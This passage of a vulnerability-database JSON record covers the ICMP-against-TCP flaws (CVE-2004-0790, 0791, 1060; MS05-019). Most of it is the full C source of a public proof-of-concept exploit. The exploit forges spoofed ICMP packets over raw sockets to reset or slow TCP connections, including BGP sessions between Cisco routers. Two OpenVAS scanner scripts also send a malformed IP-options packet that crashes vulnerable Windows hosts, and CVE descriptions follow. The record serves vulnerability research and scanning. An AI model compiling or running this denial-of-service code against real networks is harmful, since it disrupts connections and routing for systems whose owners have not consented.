"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "2004-0790"], "modified": "2005-04-20T00:00:00", "id": "EDB-ID:948", "href": "https://www.exploit-db.com/exploits/948", "sourceData": "/* HOD-icmp-attacks-poc.c: 2005-04-15: PUBLIC v.0.2\r\n*\r\n* Copyright (c) 2004-2005 houseofdabus.\r\n*\r\n* (MS05-019) (CISCO:20050412)\r\n* ICMP attacks against TCP (Proof-of-Concept)\r\n*\r\n*\r\n*\r\n* .::[ houseofdabus ]::.\r\n*\r\n*\r\n*\r\n* [ for more details:\r\n* [ http://www.livejournal.com/users/houseofdabus\r\n* ---------------------------------------------------------------------\r\n* Systems Affected:\r\n* - Cisco Content Services Switch 11000 Series (WebNS)\r\n* - Cisco Global Site Selector (GSS) 4480 1.x\r\n* - Cisco IOS 10.x\r\n* - Cisco IOS 11.x\r\n* - Cisco IOS 12.x\r\n* - Cisco IOS R11.x\r\n* - Cisco IOS R12.x\r\n* - Cisco IOS XR (CRS-1) 3.x\r\n* - Cisco ONS 15000 Series\r\n* - Cisco PIX 6.x\r\n* - Cisco SAN-OS 1.x (MDS 9000 Switches)\r\n* - AIX 5.x\r\n* - Windows Server 2003\r\n* - Windows XP SP2\r\n* - Windows XP SP1\r\n* - Windows 2000 SP4\r\n* - Windows 2000 SP3\r\n* ...\r\n*\r\n* ---------------------------------------------------------------------\r\n* Description:\r\n* A denial of service vulnerability exists that could allow an\r\n* attacker to send a specially crafted Internet Control Message\r\n* Protocol (ICMP) message to an affected system. An attacker who\r\n* successfully exploited this vulnerability could cause the affected\r\n* system to reset existing TCP connections, reduce the throughput\r\n* in existing TCP connections, or consume large amounts of CPU and\r\n* memory resources.\r\n* (CAN-2004-0790, CAN-2004-0791, CAN-2004-1060)\r\n*\r\n* ---------------------------------------------------------------------\r\n* Solution:\r\n* http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx\r\n* http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml\r\n*\r\n* Other References:\r\n* http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html\r\n* http://www.kb.cert.org/vuls/id/222750\r\n*\r\n* ---------------------------------------------------------------------\r\n* Tested on:\r\n* - Windows Server 2003\r\n* - Windows XP SP1\r\n* - Windows 2000 SP4\r\n* - Cisco IOS 11.x\r\n*\r\n* ---------------------------------------------------------------------\r\n* Compile:\r\n*\r\n* Win32/VC++ : cl -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n* Win32/cygwin: gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n* Linux : gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n*\r\n* ---------------------------------------------------------------------\r\n* Examples:\r\n*\r\n* client <---> router <---> router <---> server\r\n*\r\n* CLIENT <---> SERVER\r\n*\r\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:1\r\n* (abort the connection)\r\n*\r\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:2\r\n* (slow down the transmission rate for traffic)\r\n*\r\n*\r\n* ROUTER1 <---> ROUTER2\r\n*\r\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:179 -a:1\r\n* (DoS Cisco BGP Connections)\r\n*\r\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:80 -a:2\r\n* (slow down the transmission rate for traffic)\r\n*\r\n* ---------------------------------------------------------------------\r\n*\r\n* This is provided as proof-of-concept code only for educational\r\n* purposes and testing by authorized individuals with permission\r\n* to do so.\r\n*\r\n*/\r\n\r\n/* #define _WIN32 */\r\n\r\n#ifdef _WIN32\r\n#pragma comment(lib,\"ws2_32\")\r\n#pragma pack(1)\r\n#define WIN32_LEAN_AND_MEAN\r\n#include <winsock2.h>\r\n/* IP_HDRINCL */\r\n#include <ws2tcpip.h>\r\n\r\n#else\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <sys/timeb.h>\r\n#endif\r\n\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\n#define MAX_PACKET 4096\r\n\r\n#define DEFAULT_PORT 80\r\n#define DEFAULT_IP \"192.168.0.1\"\r\n#define DEFAULT_COUNT 1\r\n\r\n/* Define the IP header */\r\ntypedef struct ip_hdr {\r\n unsigned char ip_verlen; /* IP version & length */\r\n unsigned char ip_tos; /* IP type of service */\r\n unsigned short ip_totallength; /* Total length */\r\n unsigned short ip_id; /* Unique identifier */\r\n unsigned short ip_offset; /* Fragment offset field */\r\n unsigned char ip_ttl; /* Time to live */\r\n unsigned char ip_protocol; /* Protocol */\r\n unsigned short ip_checksum; /* IP checksum */\r\n unsigned int ip_srcaddr; /* Source address */\r\n unsigned int ip_destaddr; /* Destination address */\r\n} IP_HDR, *PIP_HDR;\r\n\r\n/* Define the ICMP header */\r\n/* Destination Unreachable Message */\r\ntypedef struct icmp_hdr {\r\n unsigned char type; /* Type */\r\n unsigned char code; /* Code */\r\n unsigned short checksum; /* Checksum */\r\n unsigned long unused; /* Unused */\r\n} ICMP_HDR, *PICMP_HDR;\r\n\r\n/* 64 bits of Original Data Datagram (TCP header) */\r\nchar msg[] =\r\n\"\\x00\\x50\" /* Source port */\r\n\"\\x00\\x50\" /* Destination port */\r\n\"\\x23\\x48\\x4f\\x44\";\r\n\r\n/* globals */\r\nunsigned long dwToIP, /* IP to send to */\r\n dwFromIP; /* IP to send from (spoof) */\r\nunsigned short iToPort, /* Port to send to */\r\n iFromPort; /* Port to send from (spoof) */\r\nunsigned long dwCount; /* Number of times to send */\r\nunsigned long Attack;\r\n\r\nvoid\r\nusage(char *progname) {\r\n printf(\"Usage:\\n\\n\");\r\n printf(\"%s <-fi:SRC-IP> <-ti:VICTIM-IP> <-fi:SRC-PORT> [-tp:int] [-a:int] [-n:int]\\n\\n\", progname);\r\n printf(\" -fi:IP From (sender) IP address\\n\");\r\n printf(\" -ti:IP To (target) IP address\\n\");\r\n printf(\" -fp:int Target open TCP port number\\n\");\r\n printf(\" (for example - 21, 25, 80)\\n\");\r\n printf(\" -tp:int Inicial value for bruteforce (sender) TCP port number\\n\");\r\n printf(\" (default: 0 = range of ports 0-65535)\\n\");\r\n printf(\" -n:int Number of packets\\n\\n\");\r\n printf(\" -a:int ICMP attacks:\\n\");\r\n printf(\" 1 - Blind connection-reset attack\\n\");\r\n printf(\" (ICMP protocol unreachable)\\n\");\r\n printf(\" 2 - Path MTU discovery attack\\n\");\r\n printf(\" (slow down the transmission rate)\\n\");\r\n printf(\" 3 - ICMP Source Quench attack\\n\");\r\n exit(1);\r\n}\r\n\r\nvoid\r\nValidateArgs(int argc, char **argv)\r\n{\r\n int i;\r\n\r\n iToPort = 0;\r\n iFromPort = DEFAULT_PORT;\r\n dwToIP = inet_addr(DEFAULT_IP);\r\n dwFromIP = inet_addr(DEFAULT_IP);\r\n dwCount = DEFAULT_COUNT;\r\n Attack = 1;\r\n\r\n for (i = 1; i < argc; i++) {\r\n if ((argv[i][0] == '-') || (argv[i][0] == '/')) {\r\n switch (tolower(argv[i][1])) {\r\n case 'f':\r\n switch (tolower(argv[i][2])) {\r\n case 'p':\r\n if (strlen(argv[i]) > 4)\r\n iFromPort = atoi(&argv[i][4]);\r\n break;\r\n case 'i':\r\n if (strlen(argv[i]) > 4)\r\n dwFromIP = inet_addr(&argv[i][4]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n break;\r\n case 't':\r\n switch (tolower(argv[i][2])) {\r\n case 'p':\r\n if (strlen(argv[i]) > 4)\r\n iToPort = atoi(&argv[i][4]);\r\n break;\r\n case 'i':\r\n if (strlen(argv[i]) > 4)\r\n dwToIP = inet_addr(&argv[i][4]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n break;\r\n case 'n':\r\n if (strlen(argv[i]) > 3)\r\n dwCount = atol(&argv[i][3]);\r\n break;\r\n case 'a':\r\n if (strlen(argv[i]) > 3)\r\n Attack = atol(&argv[i][3]);\r\n if ((Attack > 3) || (Attack < 1))\r\n usage(argv[0]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n }\r\n }\r\n return;\r\n}\r\n\r\n/* This function calculates the 16-bit one's complement sum */\r\n/* for the supplied buffer */\r\nunsigned short\r\nchecksum(unsigned short *buffer, int size)\r\n{\r\n unsigned long cksum = 0;\r\n\r\n while (size > 1) {\r\n cksum += *buffer++;\r\n size -= sizeof(unsigned short);\r\n }\r\n if (size) {\r\n cksum += *(unsigned char *)buffer;\r\n }\r\n cksum = (cksum >> 16) + (cksum & 0xffff);\r\n cksum += (cksum >>16);\r\n\r\n return (unsigned short)(~cksum);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\r\n#ifdef _WIN32\r\n WSADATA wsd;\r\n#endif\r\n int s;\r\n#ifdef _WIN32\r\n BOOL bOpt;\r\n#else\r\n int bOpt;\r\n#endif\r\n struct sockaddr_in remote;\r\n IP_HDR ipHdr,\r\n ipHdrInc;\r\n ICMP_HDR icmpHdr;\r\n int ret;\r\n unsigned long i, p;\r\n unsigned short iTotalSize,\r\n iIPVersion,\r\n iIPSize,\r\n p2,\r\n cksum = 0;\r\n char buf[MAX_PACKET],\r\n *ptr = NULL;\r\n#ifdef _WIN32\r\n IN_ADDR addr;\r\n#else\r\n struct sockaddr_in addr;\r\n#endif\r\n\r\n printf(\"\\n (MS05-019) (CISCO:20050412)\\n\");\r\n printf(\" ICMP attacks against TCP (Proof-of-Concept)\\n\\n\");\r\n printf(\" Copyright (c) 2004-2005 .: houseofdabus :.\\n\\n\\n\");\r\n\r\n if (argc < 3) usage(argv[0]);\r\n\r\n /* Parse command line arguments and print them out */\r\n ValidateArgs(argc, argv);\r\n#ifdef _WIN32\r\n addr.S_un.S_addr = dwFromIP;\r\n printf(\"[*] From IP: <%s>, port: %d\\n\", inet_ntoa(addr), iFromPort);\r\n addr.S_un.S_addr = dwToIP;\r\n printf(\"[*] To IP: <%s>, port: %d\\n\", inet_ntoa(addr), iToPort);\r\n printf(\"[*] Count: %d\\n\", dwCount);\r\n#else\r\n addr.sin_addr.s_addr = dwFromIP;\r\n printf(\"[*] From IP: <%s>, port: %d\\n\", inet_ntoa(addr.sin_addr), iFromPort);\r\n addr.sin_addr.s_addr = dwToIP;\r\n printf(\"[*] To IP: <%s>, port: %d\\n\", inet_ntoa(addr.sin_addr), iToPort);\r\n printf(\"[*] Count: %d\\n\", dwCount);\r\n#endif\r\n\r\n#ifdef _WIN32\r\n if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {\r\n printf(\"[-] WSAStartup() failed: %d\\n\", GetLastError());\r\n return -1;\r\n }\r\n#endif\r\n /* Creating a raw socket */\r\n s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);\r\n#ifdef _WIN32\r\n if (s == INVALID_SOCKET) {\r\n#else\r\n if (s < 0) {\r\n#endif\r\n printf(\"[-] socket() failed\\n\");\r\n return -1;\r\n }\r\n\r\n /* Enable the IP header include option */\r\n#ifdef _WIN32\r\n bOpt = TRUE;\r\n#else\r\n bOpt = 1;\r\n#endif\r\n ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));\r\n#ifdef _WIN32\r\n if (ret == SOCKET_ERROR) {\r\n printf(\"[-] setsockopt(IP_HDRINCL) failed: %d\\n\", WSAGetLastError());\r\n return -1;\r\n }\r\n#endif\r\n\r\n /* Initalize the IP header */\r\n iTotalSize = sizeof(ipHdr) + sizeof(icmpHdr) + sizeof(msg)-1 + sizeof(ipHdrInc);\r\n\r\n iIPVersion = 4;\r\n iIPSize = sizeof(ipHdr) / sizeof(unsigned long);\r\n\r\n ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;\r\n ipHdr.ip_tos = 0; /* IP type of service */\r\n /* Total packet len */\r\n ipHdr.ip_totallength = htons(iTotalSize);\r\n ipHdr.ip_id = htons(42451); /* Unique identifier */\r\n ipHdr.ip_offset = 0; /* Fragment offset field */\r\n ipHdr.ip_ttl = 255; /* Time to live */\r\n ipHdr.ip_protocol = 0x1; /* Protocol(ICMP) */\r\n ipHdr.ip_checksum = 0; /* IP checksum */\r\n ipHdr.ip_srcaddr = dwFromIP; /* Source address */\r\n ipHdr.ip_destaddr = dwToIP; /* Destination address */\r\n\r\n ipHdrInc.ip_verlen = (iIPVersion << 4) | iIPSize;\r\n ipHdrInc.ip_tos = 0; /* IP type of service */\r\n /* Total packet len */\r\n ipHdrInc.ip_totallength = htons(sizeof(ipHdrInc)+20);\r\n ipHdrInc.ip_id = htons(25068); /* Unique identifier */\r\n\r\n ipHdrInc.ip_offset = 0; /* Fragment offset field */\r\n ipHdrInc.ip_ttl = 255; /* Time to live */\r\n ipHdrInc.ip_protocol = 0x6; /* Protocol(TCP) */\r\n ipHdrInc.ip_checksum = 0; /* IP checksum */\r\n ipHdrInc.ip_srcaddr = dwToIP; /* Source address */\r\n ipHdrInc.ip_destaddr = dwFromIP;/* Destination address */\r\n\r\n /* Initalize the ICMP header */\r\n icmpHdr.checksum = 0;\r\n if (Attack == 1) {\r\n icmpHdr.type = 3; /* Destination Unreachable Message */\r\n icmpHdr.code = 2; /* protocol unreachable */\r\n icmpHdr.unused = 0;\r\n } else if (Attack == 2) {\r\n icmpHdr.type = 3; /* Destination Unreachable Message */\r\n icmpHdr.code = 4; /* fragmentation needed and DF set */\r\n icmpHdr.unused = 0x44000000; /* next-hop MTU - 68 */\r\n } else {\r\n icmpHdr.type = 4; /* Source Quench Message */\r\n icmpHdr.code = 0;\r\n icmpHdr.unused = 0;\r\n }\r\n\r\n memset(buf, 0, MAX_PACKET);\r\n ptr = buf;\r\n\r\n memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);\r\n memcpy(ptr, &icmpHdr, sizeof(icmpHdr)); ptr += sizeof(icmpHdr);\r\n memcpy(ptr, &ipHdrInc, sizeof(ipHdrInc)); ptr += sizeof(ipHdrInc);\r\n memcpy(ptr, msg, sizeof(msg)-1);\r\n iFromPort = htons(iFromPort);\r\n memcpy(ptr, &iFromPort, 2);\r\n\r\n remote.sin_family = AF_INET;\r\n remote.sin_port = htons(iToPort);\r\n remote.sin_addr.s_addr = dwToIP;\r\n\r\n cksum = checksum((unsigned short *)&ipHdrInc, 20);\r\n memcpy(buf+20+sizeof(icmpHdr)+10, &cksum, 2);\r\n\r\n cksum = checksum((unsigned short *)&ipHdr, 20);\r\n memcpy(buf+10, &cksum, 2);\r\n\r\n for (p = iToPort; p <= 65535; p++) {\r\n p2 = htons((short)p);\r\n memcpy((char *)(ptr+2), &p2, 2);\r\n buf[22] = 0;\r\n buf[23] = 0;\r\n cksum = checksum((unsigned short *)(buf+20), sizeof(icmpHdr)+28);\r\n memcpy(buf+20+2, &cksum, 2);\r\n\r\n for (i = 0; i < dwCount; i++) {\r\n#ifdef _WIN32\r\n ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote,\r\n sizeof(remote));\r\n#else\r\n ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote,\r\n sizeof(remote));\r\n#endif\r\n#ifdef _WIN32\r\n if (ret == SOCKET_ERROR) {\r\n#else\r\n if (ret < 0) {\r\n#endif\r\n printf(\"[-] sendto() failed\\n\");\r\n break;\r\n }\r\n }\r\n }\r\n\r\n#ifdef _WIN32\r\n closesocket(s);\r\n WSACleanup();\r\n#endif\r\n\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2005-04-20]", "sourceHref": "https://www.exploit-db.com/download/948", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2017-10-25T14:44:40", "description": "The host is running Microsoft Windows and is prone to remote code\n execution vulnerability.", "cvss3": {}, "published": "2011-11-21T00:00:00", "type": "openvas", "title": "Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2005-0048", "CVE-2004-0230", "CVE-2005-0688", "CVE-2004-1060"], "modified": "2017-10-24T00:00:00", "id": "OPENVAS:902588", "href": "http://plugins.openvas.org/nasl.php?oid=902588", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms_windows_ip_validation_code_exec_vuln.nasl 7550 2017-10-24 12:17:52Z cfischer $\n#\n# Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Microsoft Windows XP SP2 and prior.\n Microsoft Windows 2000 Server SP4 and prior.\n\n Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms05-019\";\n\ntag_impact = \"Successful exploitation will allow attacker to cause a denial of service\n and possibly execute arbitrary code via crafted IP packets with malformed\n options.\n Impact Level: System\";\ntag_insight = \"The flaw is due to insufficient validation of IP options and can be\n exploited to cause a vulnerable system to stop responding and restart or may\n allow execution of arbitrary code by sending a specially crafted IP packet\n to a vulnerable system.\";\ntag_summary = \"The host is running Microsoft Windows and is prone to remote code\n execution vulnerability.\";\n\nif(description)\n{\n script_id(902588);\n script_version(\"$Revision: 7550 $\");\n script_cve_id(\"CVE-2005-0048\", \"CVE-2005-0688\", \"CVE-2004-0790\",\n \"CVE-2004-1060\", \"CVE-2004-0230\");\n script_bugtraq_id(13116, 13658, 13124, 10183);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 14:17:52 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-21 15:15:15 +0530 (Mon, 21 Nov 2011)\");\n script_name(\"Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/14512\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/22341\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id/1013686\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms05-019\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms06-064\");\n\n script_category(ACT_KILL_HOST);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_nativelanman.nasl\", \"netbios_name_get.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"Host/runs_windows\");\n script_exclude_keys(\"SMB/samba\", \"keys/TARGET_IS_IPV6\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nif(TARGET_IS_IPV6()){\n exit(0);\n}\n\n## Get SMB Port\nport = kb_smb_transport();\nif(!port) {\n port = 445;\n}\n\n## Check Port State\nif(!get_port_state(port)) {\n exit(0);\n}\n\n## Building Exploit\ndstaddr = get_host_ip();\nsrcaddr = this_host();\nsport = rand() % (65536 - 1024) + 1024;\n\n## IP packet with an option size 39\noptions = raw_string(0x03, 0x27, crap(data:\"G\", length:38));\n\nip = forge_ip_packet( ip_v : 4,\n ip_hl : 15,\n ip_tos : 0,\n ip_len : 20,\n ip_id : rand(),\n ip_p : IPPROTO_TCP,\n ip_ttl : 64,\n ip_off : 0,\n ip_src : srcaddr,\n data : options );\n\n\ntcp = forge_tcp_packet( ip : ip,\n th_sport : sport,\n th_dport : port,\n th_flags : TH_SYN,\n th_seq : rand(),\n th_ack : 0,\n th_x2 : 0,\n th_off : 5,\n th_win : 512,\n th_urp : 0 );\n\n## Sending Exploit\nstart_denial();\nfor( i = 0; i < 5 ; i ++ ) {\n result = send_packet(tcp,pcap_active:FALSE);\n}\nalive = end_denial();\n\n## Confirm Host is Still Alive and Responding\nif(! alive) {\n security_message(port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-01-08T14:04:37", "description": "The host is running Microsoft Windows and is prone to remote code\n execution vulnerability.", "cvss3": {}, "published": "2011-11-21T00:00:00", "type": "openvas", "title": "Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2005-0048", "CVE-2004-0230", "CVE-2005-0688", "CVE-2004-1060"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310902588", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902588", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902588\");\n script_version(\"2019-12-20T12:48:41+0000\");\n script_cve_id(\"CVE-2005-0048\", \"CVE-2005-0688\", \"CVE-2004-0790\", \"CVE-2004-1060\", \"CVE-2004-0230\");\n script_bugtraq_id(13116, 13658, 13124, 10183);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:48:41 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-11-21 15:15:15 +0530 (Mon, 21 Nov 2011)\");\n script_name(\"Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability\");\n script_category(ACT_KILL_HOST);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_nativelanman.nasl\", \"netbios_name_get.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"Host/runs_windows\");\n script_exclude_keys(\"SMB/samba\", \"keys/TARGET_IS_IPV6\");\n\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id/1013686\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2005/ms05-019\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-064\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to cause a denial of service\n and possibly execute arbitrary code via crafted IP packets with malformed options.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to insufficient validation of IP options and can be\n exploited to cause a vulnerable system to stop responding and restart or may allow execution of arbitrary\n code by sending a specially crafted IP packet to a vulnerable system.\");\n\n script_tag(name:\"summary\", value:\"The host is running Microsoft Windows and is prone to remote code\n execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP SP2 and prior\n\n - Microsoft Windows 2000 Server SP4 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"remote_probe\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nif(TARGET_IS_IPV6() || kb_smb_is_samba())\n exit(0);\n\nport = kb_smb_transport();\nif(!port)\n port = 445;\n\nif(!get_port_state(port))\n exit(0);\n\ndstaddr = get_host_ip();\nsrcaddr = this_host();\nsport = rand() % (65536 - 1024) + 1024;\n\n## IP packet with an option size 39\noptions = raw_string(0x03, 0x27, crap(data:\"G\", length:38));\n\nip = forge_ip_packet( ip_v : 4,\n ip_hl : 15,\n ip_tos : 0,\n ip_len : 20,\n ip_id : rand(),\n ip_p : IPPROTO_TCP,\n ip_ttl : 64,\n ip_off : 0,\n ip_src : srcaddr,\n data : options );\n\ntcp = forge_tcp_packet( ip : ip,\n th_sport : sport,\n th_dport : port,\n th_flags : TH_SYN,\n th_seq : rand(),\n th_ack : 0,\n th_x2 : 0,\n th_off : 5,\n th_win : 512,\n th_urp : 0 );\n\nstart_denial();\nfor( i = 0; i < 5 ; i ++ ) {\n result = send_packet(tcp,pcap_active:FALSE);\n}\nalive = end_denial();\n\nif(! alive) {\n security_message(port:port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T11:50:37", "description": "Multiple TCP/IP and ICMP implementations, when using Path MTU (PMTU) discovery (PMTUD), allow remote attackers to cause a denial of service (network throughput reduction for TCP connections) via forged ICMP (\"Fragmentation Needed and Don't Fragment was Set\") packets with a low next-hop MTU value, aka the \"Path MTU discovery attack.\" NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2004-04-12T04:00:00", "type": "cve", "title": "CVE-2004-1060", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2018-10-19T15:30:00", "cpe": ["cpe:/a:icmp:icmp:*", "cpe:/a:tcp:tcp:*"], "id": "CVE-2004-1060", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1060", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:icmp:icmp:*:*:*:*:*:*:*:*", "cpe:2.3:a:tcp:tcp:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:45:51", "description": "Multiple TCP/IP and ICMP implementations allow remote attackers to cause a denial of service (reset TCP connections) via spoofed ICMP error messages, aka the \"blind connection-reset attack.\" NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2005-04-12T04:00:00", "type": "cve", "title": "CVE-2004-0790", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": 